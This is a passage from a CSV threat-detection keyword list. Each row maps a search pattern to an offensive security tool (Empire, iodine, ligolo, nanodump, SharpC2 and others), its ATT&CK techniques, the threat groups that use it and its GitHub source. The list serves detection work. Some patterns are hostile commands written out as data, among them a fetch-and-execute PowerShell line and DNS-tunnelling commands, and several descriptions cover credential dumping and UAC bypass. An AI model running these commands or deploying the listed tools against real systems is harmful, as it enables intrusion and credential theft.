PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-WmiShadowCopy*",".{0,1000}Invoke\-WmiShadowCopy.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WscriptElevate*",".{0,1000}Invoke\-WscriptElevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ZeroLogon*",".{0,1000}Invoke\-ZeroLogon.{0,1000}","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","3","211","47","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z" 
"*Invoke-Zerologon*",".{0,1000}Invoke\-Zerologon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoking CreateSvcRpc (by @x86matthew*",".{0,1000}Invoking\sCreateSvcRpc\s\(by\s\@x86matthew.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*io_dirtycow.c*",".{0,1000}io_dirtycow\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*io_dirtycow.so*",".{0,1000}io_dirtycow\.so.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*iodine -*",".{0,1000}iodine\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine -f *",".{0,1000}iodine\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine IP over DNS tunneling client*",".{0,1000}iodine\sIP\sover\sDNS\stunneling\sclient.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine IP over DNS tunneling server*",".{0,1000}iodine\sIP\sover\sDNS\stunneling\sserver.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine -v*",".{0,1000}iodine\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -*",".{0,1000}iodined\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -c*",".{0,1000}iodined\s\-c.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -f *",".{0,1000}iodined\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -v*",".{0,1000}iodined\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest/*",".{0,1000}iodine\-latest\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest-android.zip*",".{0,1000}iodine\-latest\-android\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest-win32*",".{0,1000}iodine\-latest\-win32.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest-windows*",".{0,1000}iodine\-latest\-windows.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-server.service*",".{0,1000}iodine\-server\.service.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodinetestingtesting*",".{0,1000}iodinetestingtesting.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iomoath/PowerShx*",".{0,1000}iomoath\/PowerShx.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*iomoath/SharpSpray*",".{0,1000}iomoath\/SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*ionide *",".{0,1000}ionide\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*ionided *",".{0,1000}ionided\s.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*ios7tojohn.pl*",".{0,1000}ios7tojohn\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking 
environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ip tuntap add user * mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\s.{0,1000}\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ip tuntap add user root mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\sroot\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*IPeerToPeerService.*",".{0,1000}IPeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
"*IPfuscation.sln*",".{0,1000}IPfuscation\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*IPfuscation.vcxproj*",".{0,1000}IPfuscation\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *",".{0,1000}iptables\s\-\%c\sOUTPUT\s\-p\stcp\s\-d\s127\.0\.0\.1\s\-\-tcp\-flags\sRST\sRST\s\-j\sDROP\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*iptables -t nat -A REDSOCKS*",".{0,1000}iptables\s\-t\snat\s\-A\sREDSOCKS.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" 
"*IQoJb3Jpz2cXpQRkpVX3Uf*",".{0,1000}IQoJb3Jpz2cXpQRkpVX3Uf.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IReversePortForwardService.*",".{0,1000}IReversePortForwardService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*irkjanm/krbrelayx*",".{0,1000}irkjanm\/krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*irm unit259.fyi/dbgui | iex*",".{0,1000}irm\sunit259\.fyi\/dbgui\s\|\siex.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*irs.exe -*",".{0,1000}irs\.exe\s\-.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and 
without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irs.exe exec*",".{0,1000}irs\.exe\sexec.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irs.exe list*",".{0,1000}irs\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irsl/curlshell*",".{0,1000}irsl\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*irsl/curlshell*",".{0,1000}irsl\/curlshell.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*is_binary_in_gtfobins(*",".{0,1000}is_binary_in_gtfobins\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*is_kirbi_file*",".{0,1000}is_kirbi_file.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*is_proxy_stub_dll_loaded*",".{0,1000}is_proxy_stub_dll_loaded.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*isShellcodeThread*",".{0,1000}isShellcodeThread.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*issue_shell_whoami*",".{0,1000}issue_shell_whoami.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*it will extract domain controller private key through RPC uses it to decrypt all 
credentials*",".{0,1000}it\swill\sextract\sdomain\scontroller\sprivate\skey\sthrough\sRPC\suses\sit\sto\sdecrypt\sall\scredentials.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*It2H@Qp3Xe*sxdc#KA8)dbMtI5Q7&FK*",".{0,1000}It2H\@Qp3Xe.{0,1000}sxdc\#KA8\)dbMtI5Q7\&FK.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Itay Migdal*",".{0,1000}Itay\sMigdal.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - 